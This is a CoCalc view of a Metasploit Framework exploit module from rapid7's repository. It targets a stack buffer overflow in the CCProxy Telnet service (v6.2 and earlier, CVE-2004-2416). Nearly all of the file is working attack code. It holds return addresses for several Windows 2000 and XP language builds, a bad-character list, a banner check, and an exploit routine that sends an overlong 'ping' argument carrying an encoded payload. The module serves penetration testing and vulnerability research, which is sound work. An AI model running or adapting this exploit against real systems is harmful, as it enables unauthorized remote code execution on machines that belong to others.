Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb
19516 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name'	=> 'CCProxy Telnet Proxy Ping Overflow',

16
        'Description'	=> %q{

17
          This module exploits the YoungZSoft CCProxy <= v6.2 suite

18
          Telnet service. The stack is overwritten when sending an overly

19
          long address to the 'ping' command.

20
        },

21
        'Author' => [ 'aushack' ],

22
        'Arch'	=> [ ARCH_X86 ],

23
        'License' => MSF_LICENSE,

24
        'References' => [

25
          [ 'CVE', '2004-2416' ],

26
          [ 'OSVDB', '11593' ],

27
          [ 'BID', '11666' ],

28
          [ 'EDB', '621' ],

29
        ],

30
        'Privileged'	=> false,

31
        'DefaultOptions' => {

32
          'EXITFUNC' => 'thread',

33
        },

34
        'Payload' => {

35
          'Space'	=> 1012,

36
          'BadChars' => "\x00\x07\x08\x0a\x0d\x20",

37
        },

38
        'Platform' => ['win'],

39
        'Targets' => [

40
          # Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.

41
          [ 'Windows 2000 Pro All - English', { 'Ret' => 0x75023411 } ], # call esi ws2help.dll

42
          [ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2b81 } ], # call esi ws2help.dll

43
          [ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa2b22 } ], # call esi ws2help.dll

44
          [ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa1a97 } ], # call esi ws2help.dll

45
          [ 'Windows XP SP2 - English', { 'Ret' => 0x71aa1b22 } ], # call esi ws2help.dll

46
        ],

47
        'DisclosureDate' => '2004-11-11',

48
        'Notes' => {

49
          'Reliability' => UNKNOWN_RELIABILITY,

50
          'Stability' => UNKNOWN_STABILITY,

51
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

52
        }

53
      )

54
    )

55


56
    register_options(

57
      [

58
        Opt::RPORT(23),

59
      ]

60
    )

61
  end

62


63
  def check

64
    connect

65
    banner = sock.get_once || ''

66
    disconnect

67


68
    if banner.to_s =~ /CCProxy Telnet Service Ready/

69
      return Exploit::CheckCode::Detected

70
    end

71


72
    return Exploit::CheckCode::Safe

73
  end

74


75
  def exploit

76
    connect

77


78
    sploit = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)

79
    sock.put(sploit + "\r\n")

80


81
    handler

82
    disconnect

83
  end

84
end

85


86